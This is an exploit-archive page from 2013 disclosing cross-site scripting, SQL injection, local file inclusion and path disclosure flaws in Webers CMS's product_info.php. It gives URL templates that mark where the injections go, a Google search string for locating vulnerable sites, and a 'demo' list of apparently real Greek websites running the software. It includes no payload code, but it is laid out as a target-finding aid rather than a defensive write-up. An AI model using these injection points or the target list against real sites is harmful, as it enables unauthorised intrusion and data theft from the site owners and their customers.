Home / exploits Webers CMS XSS / LFI / SQL Injection
Posted on 07 November 2013
######################################################################## # # Exploit Title: Webers CMS Multiple Vulnerability # Date: 2013 5 November # Author: Hossein Hezami ( Dr.3v1l ) # Vendor: http://www.webers.gr # Version: All Version # Security Risk: High # Category: WebApps # Google Keywords: intext:"created by Webers" site:gr # Tested on: Linux # ######################################################################## # # [~] Exploit : XSS / SQL Injection / LFI / Path disclosure Vulnerability # # XSS : xss in product_info.php file => parametrs : lang , cPath , products_id # # http://<server>/product_info.php?cust_id=&template_id=&lang=gr[XSS]&cPath=[XSS]&template_id=website&cPath=[XSS]&from=sitemap&products_id=[XSS] # # SQL Injection : sql injection in product_info.php file => parametrs : lang , cPath , products_id # # http://<server>/product_info.php?cust_id=&template_id=&lang=gr[SQL-Injection]&cPath=[SQL-Injection]&template_id=website&cPath=[SQL-Injection]&from=sitemap&products_id=[SQL-Injection] # # LFI : lfi in product_info.php file => parametr : to # # http://<server>/product_info.php?cust_id=&template_id=&lang=en&cPath=&to=[LFI] # # And To All Parametrs have "Path disclosure" ;) # ######################################################################## # # [~] Demo : # # http://boXfrost.gr/website/product_info.php?cust_id=&template_id=&lang=gr&cPath=&template_id=website&cPath=&from=sitemap&products_id=123 # http://eXzein-aet.gr/website/product_info.php?cust_id=&template_id=&lang=gr&cPath=&template_id=website&cPath=&from=sitemap&products_id=123 # http://delXarte.gr/website/product_info.php?cust_id=&template_id=&lang=en&cPath=&cPath=&from=sitemap&products_id=3 # http://etiXoll.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://forXhellas.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://meXe.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://ktiXio3.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://e-fiXnessclub.gr/website/product_info.php?cust_id=&template_id=&lang=gr&cPath=6_100_227&products_id=1578 # http://anaXycon.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://mavXos.com.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=2 # http://norXabox.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://fotiXXadis.com.gr/website/product_info.php?cust_id=&template_id=&lang=en&cPath=&cPath=&from=sitemap&products_id=2 # http://rXt.gr/website/product_info.php?template_id=38&lang=gr&cPath=&to=homepage.php # http://iliXstudios.gr/website/product_info.php?cust_id=&template_id=&lang=en&cPath=&to=index.php # http://oavXoias.gr/website/product_info.php?cust_id=&template_id=&lang=&cPath=&cPath=-2&from=sitemap&newid=all # ######################################################################## # # [~] Contact Me : # # Teacher.3v1l@live.com # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # IR.LinkedIN.com/in/Hossein3v1l # # http://0websecurity.ir # Black_Devils B0ys ########################################################################
